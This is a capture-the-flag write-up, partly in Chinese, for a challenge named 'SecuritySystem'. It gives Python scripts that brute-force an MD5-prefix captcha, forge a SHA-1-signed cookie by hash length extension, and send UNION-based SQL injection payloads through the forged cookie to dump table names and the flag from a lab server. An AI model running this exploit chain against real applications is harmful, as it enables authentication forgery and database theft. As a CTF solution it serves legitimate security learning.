SecuritySystem
题目描述:This is the Security System, no hacker can take over it. Now maybe u can find some vul for this system. Take it easy…
- 破解验证码 getCaptch.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
target = "3aab4a"

# Every numeric candidate of 4 to 7 digits is hashed and each one whose MD5
# hex digest begins with ``target`` is printed.  The search does not stop at
# the first hit, so every colliding value in range is reported.  Matching only
# 6 hex characters (24 bits) of the digest is why this exhaustive search of
# roughly ten million values is feasible at all.
for digits in range(4, 8):
    lower, upper = 10 ** (digits - 1), 10 ** digits
    for candidate in range(lower, upper):
        digest = hashlib.md5(str(candidate).encode()).hexdigest()
        if digest.startswith(target):
            print(candidate)
注册后进入主页面,取到的关键信息如下:
user='dXNlcg==' # base64
auth='0ace2c1e9e93134965974f60e05716d2ba5ebf0e' # 哈希值
PHPSESSID='kabduh8972c8g2m9lu3086ad14' # PHP 会话标识符
- 确定密钥长度 getKeyLen.py
使用哈希长度扩展攻击,推测出长度为 14 位。
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
import re
# https://github.com/viensea1106/hash-length-extension
# pip install length-extension-tool
import HashTools
import requests
def main():
    """Probe the length of the server-side secret behind the ``auth`` cookie.

    The ``auth`` value is presumably ``sha1(secret || user)`` with no HMAC, so a
    valid signature for ``user || padding || "hack"`` can be derived from the
    known digest once the secret length is guessed correctly.  Candidate
    lengths are tried from 1 upwards; the first one the server accepts (the
    page contains ``Welcome ...</p>``) is printed and the function returns.
    The loop has no upper bound, so it only ends when some length is accepted.

    Side effects: one HTTP GET per candidate length and progress messages on
    stdout.  Returns nothing.
    """
    known_user = "user"
    suffix = "hack"
    known_signature = "0ace2c1e9e93134965974f60e05716d2ba5ebf0e"
    session_id = "ul81cinqvo9r70fghdphi4qa37"
    endpoint = "http://eci-2zecb56v9wzd32pvr7ih.cloudeci1.ichunqiu.com/index.php"
    welcome_re = re.compile(r"Welcome (.*)</p>")

    candidate_len = 1
    while True:
        forged_data, forged_signature = HashTools.new("sha1").extension(
            secret_length=candidate_len,
            original_data=known_user.encode(),
            append_data=suffix.encode(),
            signature=known_signature,
        )
        jar = {
            "auth": forged_signature,
            "user": base64.b64encode(forged_data).decode("utf-8"),
            "PHPSESSID": session_id,
        }
        page = requests.get(endpoint, cookies=jar).text
        if welcome_re.findall(page):
            print(f"找到匹配项!密钥长度:{candidate_len}")
            return
        print(f"密钥长度 {candidate_len} 尝试失败,尝试下一个长度...")
        candidate_len += 1
if __name__ == "__main__":  # entry point when run as a script, not on import
    main()
- 获取 Flag getFlag.py
使用 payload 构造 user 进行 SQL 注入,成功获取 flag。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
import re
# https://github.com/viensea1106/hash-length-extension
# pip install length-extension-tool
import HashTools
import requests
user = "user"
auth = "0ace2c1e9e93134965974f60e05716d2ba5ebf0e"
PHPSESSID = "ul81cinqvo9r70fghdphi4qa37"
url = "http://eci-2zecb56v9wzd32pvr7ih.cloudeci1.ichunqiu.com/index.php"
keyLen = 14  # secret length established by getKeyLen.py
s = requests.session()

# Each entry is appended to the signed ``user`` value through a SHA-1 length
# extension and then reaches the server's query unescaped.  Two separate
# weaknesses are chained: a forgeable signature (plain hash of secret || data
# instead of an HMAC) and an unparameterised SQL query; closing either one on
# the server side breaks the chain.
payloads = [
    "' UNION SELECT 1,2#",  # 测试列数
    "' UNION SELECT database(),2#",  # 获取当前数据库名
    "' UNION SELECT GROUP_CONCAT(table_name SEPARATOR ', '), 2 FROM information_schema.tables WHERE table_schema=database()#",  # 获取所有数据表
    "' UNION SELECT flag,2 FROM flag LIMIT 1#"  # 获取 flag
]

interest_re = re.compile(r"interest:(.*?)</p>")
dream_re = re.compile(r"dream:(.*?)</p>")

for payload in payloads:
    forged_data, forged_signature = HashTools.new("sha1").extension(
        secret_length=keyLen,
        original_data=user.encode(),
        append_data=payload.encode(),
        signature=auth,
    )
    jar = {
        "auth": forged_signature,
        "user": base64.b64encode(forged_data).decode("utf-8"),
        "PHPSESSID": PHPSESSID,
    }
    body = s.get(url, cookies=jar).text
    print(f"Payload: {payload}")
    # Indexing the first match raises IndexError when the marker is absent,
    # so a response without both markers stops the script at that payload.
    print(f"result1: {interest_re.findall(body)[0]}")
    print(f"result2: {dream_re.findall(body)[0]}")
    print("-" * 100)